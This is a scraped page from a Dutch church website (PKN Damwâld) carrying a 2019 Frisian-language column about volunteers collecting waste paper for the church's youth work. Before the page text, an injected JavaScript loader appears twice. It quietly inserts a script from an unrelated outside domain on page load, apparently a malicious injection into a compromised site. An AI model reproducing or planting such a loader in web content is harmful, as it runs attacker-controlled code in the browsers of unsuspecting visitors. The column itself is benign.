;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Âld papier en âlde minsken……. - PKN Damwâld

Âld papier en âlde minsken…….

Gepubliceerd op: woensdag 2 oktober 2019

Elke léste sneon fan de moanne wurdt der op mij (en nog wol fjirtich oaren) rekkene; It âld papier ophelje. Mei de opbringsten hjirfan wurd it jeugdwurk fan ús tsjerke betelle.  No sil jim tinke; neat gjin nijs,dat wisten wij al want sa giet it al jierrenlang,en dat is wier. Sels bin ik ek al moai wat jierren frijwilliger om it âld papier op te heljen. Geandewei de jierren falt it mij op dat der wat feroaret.  Sa’n 20 jier lyn wie it measte papier wat bij de dyk stie netsjes ynpakt en stevig féstbûn mei in stik “pakjetou”, faaks bij de âldere minsken.  Lykwols,de léste jierren oerkomt it mij hieltyf faker dat it âld papier net stevig ferpakt,  bij de dyk stiet mar, om it samar te sizzen, bij de dyk “leit”, of nog mâlder, yn plastiek pûden “ferpakt”is.  Sjogge wij it âld papier miskien nog altiid as ôffal en gean we der dérom sa sleau mei om? Wij minsken witte wat der yn it Grutte Boek stiet; nei dit leven wachtet ús in nei leven! Mei it âld papier is it net oars, sterker nog, it is goed te witten dat it papier fan nederlâns fabrikaat tot wol seis (!) keer  ta recyceld wurdt as it tominsten skjin oanlevere is. Papier wat yn de griize container smiten wurdt en dus net skjin mear is, kin net wer brûkt wurde om der wer nij papier fan te meitsjen.  Sa soargje wij der mei syn allen foar dat sa’n 80 procent fan it papier opnij brûkt wurd en ek nog in moaie bûs-sint opsmyt foar it jeugdwurk! De moraal fan it ferhaal; Bliuw safolle as mooglik it âld papier oanleverjen en doch dat lykas de (measte) âlde minsken; Sa krijt ek it âld papier in “twadde”leven!

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns